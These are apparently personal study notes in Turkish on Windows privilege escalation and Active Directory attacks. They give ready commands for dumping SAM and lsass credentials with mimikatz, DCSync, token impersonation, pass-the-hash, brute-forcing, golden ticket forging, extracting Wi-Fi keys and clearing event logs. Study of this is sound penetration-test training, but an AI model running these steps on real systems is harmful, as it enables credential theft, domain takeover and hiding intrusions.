Windows Privilege Escalation Notes 2

microsoft baseline secuirty analyzer

seth aracı - rdp mitm , lm ve ntlm clear text olarak alır

llmnr -> vista,server 2008 2012, windows 7 8 10 , ipv4 ve 6 için geçerli olan clientlerin komşu bilgisayalarının isim çözümlenmesi için kullanılan protokol

netbios -> lan üzerindeki farklı pclerin iletişim kurmasını sağlayan sistem. WINS sunucusunun bilgisayarların netbios isimlerini ip adlersine çözümlenmesi ile gerçekleşir


Responder, LLMBR/NBT-ns/m-dns poisoning aracı

services postresql start --> büyük yapılarda smb_login gibi login olunan cihazlar gözden kaçabilir



snmp-check -c public IP

post exploit = sızma sonrası


Priv Esc

whoami hangi kullanıcı hakları
net use > sisteme bağlı olan kllanıcı tespiti
systeminfo
wmic qfe > sistemde kurulması gereken güvenlik yamaları
wmic logicaldisk get caption,description,providername > disk ve sürücüler
net users > sistemde oluşturulan yerel kullanıcılar
qwinsta > sistemde açık rdp oturumları
net localgroup > sistemde bulunan yerel kullanıcı ve sistem grupları
net user NAME > sistemde bulunan kullanıcı hakkında bilgi almak
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"  Autologon var mı
cmdkey /list > Credential Manager da bulunan veriler

Sam/system dosyalarına erişim
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

tasklist > processler
tasklist /svc > tasklist ve servisler 
tasklist /v > hangi sistem hakları?

Windows sürümüne göre exploit 

powershellde script çalışmadan once import edilmesi gerekir,  Import-Module ./exploit.ps1
daha sonra Invoke-CVE-CVE yazılır






Token manipülasyonu IIS server
list_tokens -u > tokenleri görüntüler
load incognito > token değişimi için komut
potato.exe > token oluşturmak için hedef sistemde "C:\Users\Public" dizinine yükle meterpreter ile
uploaddan sonra meterpreterde dosyayı çalıştırmak için  >  execute -c -f potato.exe
tekrar tokenleri listelediğimizde SysAdmin'in tokeni gözükücek
token değiştirmesi için incognito modülü ile > impersonate_token "NT AUTHORITY\SYSTEM" komutunu kullnarak farklı bir hesaba bürünme saldırısı gerçekleşir.
getuid ile kontrol ettiğimizde SYSADM oluruz.




3.parti uygulamalarda priv esc.

Yetkisiz kullanıcı ile meterpreterdeyken
meta modülü > enum_applications > kurulu olan uygulamaları tespit etmek



utilman.exe fiziksel erişim




Active Directory Bilgi Toplama Teknikleri

PowerShellMafia / PowerView.ps1 > Github > hedef makineye indir
Import-Module .\PowerView_ps1.ps1

Get-NetDomain > domain ismini ve domain sunucusunun hostname'i
Get-NetDomainController > hedef dc de çalışan os , ip , partitions gibi bilgiler
Get-DomainSID > sid numarası
Get-NetComputer -Ping > ağda pinge acık olan cihazların hostname ismi
Get-NetGroup *admin* > grupların içersinde admin kelimesi geçen tüm grupları listeler
Get-NetGroup -UserName satis.user > satis.user kullanıcısının hangi domain gruplarına ait old. gösterir
Get-NetGroupMember -GroupName "Domain Admins" > domain admin grubuna dahil olan kullanıcıları gösterir
Get-NetLocalGroup -ComputerName BT-PC > domaindeki herhangi bir kllanıcının tüm lokal admin ve yetkilerini tespit eder
Get-NetLoggedon -ComputerName "BT-PC" > daha önce aktif olarak oturum açmış kullanıcılar
Get-NetGroup > tüm gruplar
Invoke-ShareFinder > paylaşıma açık dizinler
Invoke-EnumerateLocalAdmin > istemci üzerindeki lokal admin hesapları
Invoke-UserHunter -CheckAccess > domain admin kullancısının oturum açtığı pcler

meterpreter(?) search -f *.doc
clearev - log kayıtlarının silinmesi

netsh wlan show profiles -> kayıtlı kablosuz ağlar
netsh wlan show profiles name="Teknik" key=clear > ağın parolası









PowerShell ile bruteforce(domaindeki kullanıcılara)

samratashok/Invoke-BruteForce > github > hedef sisteme aktar
Import-Module ./Invoke-BruteForce.ps1
Invoke-BruteForce -ComputerName ersin.local -UserList DIZIN -PasswordList DIZIN -Service ActiveDirectory -Verbose

yerel güvenlik politikalarından sorumlu,kullanıcı kimlik doğrulama süreçleri > lssass.exe > NT Authority/System ile çalışır > system32 altında bulunur

oturum açma süreci
1.k adı , parola girer
2.lssass.exe aracılığı ile SAM veritabanına gider
3.bilgiler sam veritabanıyla karşılaştırılır
4.Doğruysa lssass.exe kullanıcının parolasını hashli bir şekilde tutarak sisteme alır


lssass.exe servisine mimikatz.exe dosyasını enjekte ederek bypass edilir

meterpreter  1  load mimikatz
2  kerberos





LM/NTLM parolaların ele geçirilmesi

Windows os'da k.adı ve parolalar System32/config içinde SAM veritabanında tutulur
Girilen sistemde yetki System se hashdump yaparak hash bilgileri alınır



DCSync Saldirilari

Domain Controller gibi davranması nedeniyle diğer DC'lerdeki id pw alır.

Adımlar
1: Yetkili gruplara dahil olan kullanıcıya ihtiyaç var(Enterprise Admin,Administrator,Domain admins,Domain controllers vs)
2:mimikatz üzerinden dcsync saldırısı

Sahte kerberos biletleri kullanılabilir

mimikatz çalıştırıldıktan sonra privilege::debug ile debug modülü yükle

lsadump::dcsync /domain:ersin.local /all /csv    ile domaindeki kullanıcıların parola hash bilgisi alınır

Alternatif olarak(mimikatz) şu scriptte kullanılabilir
github,InvokDCSync.ps1






NTDS.dit saldırısı

Active Directory verilerinin depolandığı,C windows NTDS dizini altında NTDS.dit veritabanı dosyasıdır
Parola bilgileri,nesneler,grupşar,grup üyeliği ve active directory verileri bulunur

Meterpreter ile background, domain_hashdump modulu kullanılır






LSSASS Dump ile parola elde etme

Bu saldırı,yetki yükseltme başarısız olan bir sistemde,lssass.exe servisi dump edilerek offline bir şekilde bellekten parola bilgileri elde etmekte kullanılır
**Antivirus ve endpoint kurulu sistemlerde mimikatz zararlı olarak göründüğünden AV bypass tekniği olarakta kullanılır**

Hedef sistemde Task Manager açılarak Process Sekmeesinden lssass.exe görünür,sağ tık create dump yapılarak kaydedilir.
lssass.DMP dosyası mimikatz klasörüne kopyalanır.
mimikatz.exe çalıştırılır  privilege::debug komutu ile bug moduna geçilir.
sekurlsa::minidump lsass.DMP    komutu ile dump ettiğimiz dosya mimikatz'e import edilir.
sekurlsa::logonpasswords  ile bellekte bulunan k.adı,acık parolave hash bilgileri elde edilir.







Pass The Hash Saldırısı(Yetkili kullanıcı gerek veya yetki yükselttikten sonra)

Sunucu veya istemciye 445 portundan  parola veya LM NTLM hash özetleri ile sisteme uzaktan bağlanmaya yarar.
Her zaman açık parolalar elde edilemeyebilir. Parola özetlerini kırmak yerine pass the hash ile oturum açılabilir.
Pth-winexe aracı ile yapılabilir.
Pth-winexe -U <Domain/Kullanıcıadı>%LM:NTLMHash //HEDFIP cmd -system
LM değerinin sadece değer olarak girilmesi gerekli.

MSF pass the hash için , smb/psexec modülü kullanılır
mimikatz ile de yapılabilir.








Golden Ticket Saldırısı

1 Domain yapısında olan bir sunucunun ele geçirilmesi
2 Domain hakkı olan bir kullanıcının parola bilgisinin ele geçirilmesi
3 Active Directory sunucusuna erişerek KRBTG kullanıcı parolasının hashinin elde edilmesi

Active Directory de en yetkili hesap KRBTGT dir.
KRBTG hesabının hashi elde edilirse yeni bir kerberos bileti oluşturulur ve KRBTG hesabına bürünür.
Active Directory e bağlı herhangi bir sisteme sınırsız ve sistem hakları ile erişim sağlar.


Kerberos: Güvenli olmayan ağ üzerinde haberleşen kaynakların,kendi kimliklerini ispatlayarak iletişim kurmalarını sağlayan doğrulama protokolü
KDC : Kerberos kimlik doğrulamada bir servis
TGT : Kerberos bileti veren servis
KRBTG Hesabı : KDC servisine ait ve TGT biletlerini vermekle sorumlu hesap.




Saldırı süreci örnek,


1 Active directory sunucusuna rdp veya pass the hash yöntemi ile admin haklarına oturum elde etme
2 etki alanının adını ve SID numarası elde edilmektedir
3 mimikatz veya farklı bi araçla KRBTGT hesabının hash bilgisi ele geçirilir
4 Elde edilen hash ile mimikatz veya farklı bi araçla  golden ticket oluşturulur


KRBTGT kullanıcısının hash değerini Dcsync veya NTDIS.dit saldırısı ile elde edilebilir.


mimikatz karşı tarafa yüklenmiştir.
SID değerini almak için whoami/user komutu
Ipconfig /all komutu ile dns ismi öğrenilir.
mimikatz çalıştırılır ve     lsadump::lsa /inject /name:krbtgt    komutu ile hesabın parola hashi alınır. Primary Bölümünde NTLM hashi görülür.

Bunlardan sonra ,

Bir şekilde ele geçirilmiş bir makine üzerinden yetkisiz kullanıcı il meterpreter oturumu elde edilmiştir.
Golden ticket saldırısı için mimikatz modülünü yüklemek için load kiwi komutu kullanılır.
kerberos_ticket_list  komutu ile geçerlilik süresi kontrol edilebilir.
Golden ticket için meterpreter satırında mimikatz kullanılır.
golden_ticket_create -d <Domain> -s <SID> -k <KRBGTG HASH> -u <KULLANICIADI> -g <KULLANICIID-500,502,512> -t /root/ticket.krbtgt
golden_ticket_purge   bellekteki ticketler silinir.
golden_ticket_list   ile kontrol edilir.
Oluşturduğumuz ticketi yüklemek için
kerberos_ticket_use /root/ticket.krbtgt
kerberos_ticket_list    ile kontrol edilir.